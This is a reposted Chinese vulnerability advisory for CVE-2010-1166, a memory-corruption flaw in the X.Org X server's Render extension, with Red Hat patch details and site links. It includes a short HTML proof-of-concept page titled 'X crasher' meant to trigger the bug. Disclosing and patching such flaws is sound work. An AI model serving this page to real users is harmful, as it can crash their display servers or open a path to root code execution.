发布日期:2010-04-28
更新日期:2010-04-30受影响系统:
X.org xorg-server 1.1.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 39758
CVE ID: CVE-2010-1166X.Org X Server是多个厂商操作系统中所捆绑的X窗口系统显示服务器。X.Org X server的Render扩展所使用的mod()宏存在计算错误,mod()宏可能返回比其第二个参数(除数)更大的值,导致Render的运算中出现过多的读写操作,触发内存破坏。恶意的授权客户端可以利用这个漏洞导致X.Org服务器崩溃或以root权限执行任意代码。<*来源:Andrew Schultz
链接:https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=495733
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=582601
https://www.redhat.com/support/errata/RHSA-2010-0382.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<!DOCTYPE html>
<html>
<head>
<title>X crasher</title>
</head>
<body>
<div style="height: 2700px; background: url(http://media.buffalonews.com/static/images/shared/bg_sections_main_2.gif) left;"></div>
</body>
</html>建议:
--------------------------------------------------------------------------------
厂商补丁:RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0382-01)以及相应补丁:
RHSA-2010:0382-01:Important: xorg-x11-server security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0382.htmlLinux Kernel sctp_process_unk_param()函数远程拒绝服务漏洞Opera浏览器内容写入未初始化内存漏洞相关资讯 Linux漏洞
- 敲击28次退格键之后:Linux漏洞可 (12/18/2015 11:22:28)
- Linux出现重大漏洞 GHOST ? (01/30/2015 18:35:07)
- Linux 2.6.31本地代码执行漏洞( (07/07/2014 07:51:17)
| - Red Hat Linux 修补“libuser”库 (07/26/2015 06:39:34)
- 红帽反驳:“Grinch(鬼精灵)”算 (12/30/2014 07:38:23)
- Linux gcc++漏洞:普通用户获得 (08/16/2013 11:57:41)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
|
易网时代-编程资源站